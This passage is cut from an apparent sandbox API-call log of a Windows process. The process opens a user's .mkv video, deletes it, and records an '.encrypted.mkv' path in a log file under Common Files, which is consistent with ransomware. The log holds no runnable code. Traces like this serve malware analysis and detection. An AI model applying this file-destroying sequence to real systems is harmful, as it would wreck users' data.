(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ejdsspxab.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0043.009] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.009] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.009] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.009] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0043.009] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.009] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.010] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.010] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.010] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.010] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.010] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.010] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.010] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0043.010] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.010] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.011] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.011] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.011] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.011] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.011] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv", lpFilePart=0x0) returned 0x41 [0043.011] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1c70ab0, ftCreationTime.dwHighDateTime=0x1d5c0af, ftLastAccessTime.dwLowDateTime=0x72ef5940, ftLastAccessTime.dwHighDateTime=0x1d5c503, ftLastWriteTime.dwLowDateTime=0x1957b360, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x182dc, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="ejDsspxAB.mkv", cAlternateFileName="EJDSSP~1.MKV")) returned 0x7c2240 [0043.011] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ejdsspxab.mkv")) returned 1 [0043.013] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1c70ab0, ftCreationTime.dwHighDateTime=0x1d5c0af, ftLastAccessTime.dwLowDateTime=0x72ef5940, ftLastAccessTime.dwHighDateTime=0x1d5c503, ftLastWriteTime.dwLowDateTime=0x1957b360, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x182dc, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="ejDsspxAB.mkv", cAlternateFileName="EJDSSP~1.MKV")) returned 0 [0043.013] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0043.013] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.013] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0043.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0043.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0043.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0043.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0043.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.014] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.014] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0043.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0043.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.014] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0043.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.014] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0043.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.014] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0043.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0043.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.015] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0043.015] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.015] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.015] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0043.015] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.015] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0043.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0043.015] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.015] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0043.016] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x364a, lpOverlapped=0x0) returned 1 [0043.016] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0043.016] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x364a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.016] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0043.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0043.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.encrypted.mkv\r\n", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0043.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4e) returned 0x7f3688 [0043.016] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.encrypted.mkv\r\n", cchWideChar=78, lpMultiByteStr=0x7f3688, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.encrypted.mkv\r\n", lpUsedDefaultChar=0x0) returned 78 [0043.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0043.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0043.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0043.016] WriteFile (in: hFile=0x128, lpBuffer=0x7f36e0*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f36e0*, lpNumberOfBytesWritten=0x6aee3c*=0x4d, lpOverlapped=0x0) returned 1 [0043.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0043.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.016] CloseHandle (hObject=0x128) returned 1 [0043.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0043.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0043.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0043.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0043.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0043.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0043.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0043.021] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0043.021] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0043.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0043.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0043.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0043.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0043.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.022] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0043.022] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.022] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0043.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0043.023] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0043.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0043.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5b8 [0043.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0043.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0043.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0043.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0043.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0043.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889910 [0043.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0043.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0043.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0043.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0043.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0043.023] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0043.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0043.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0043.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0043.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0043.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0043.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0043.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0043.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0043.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0043.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0043.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 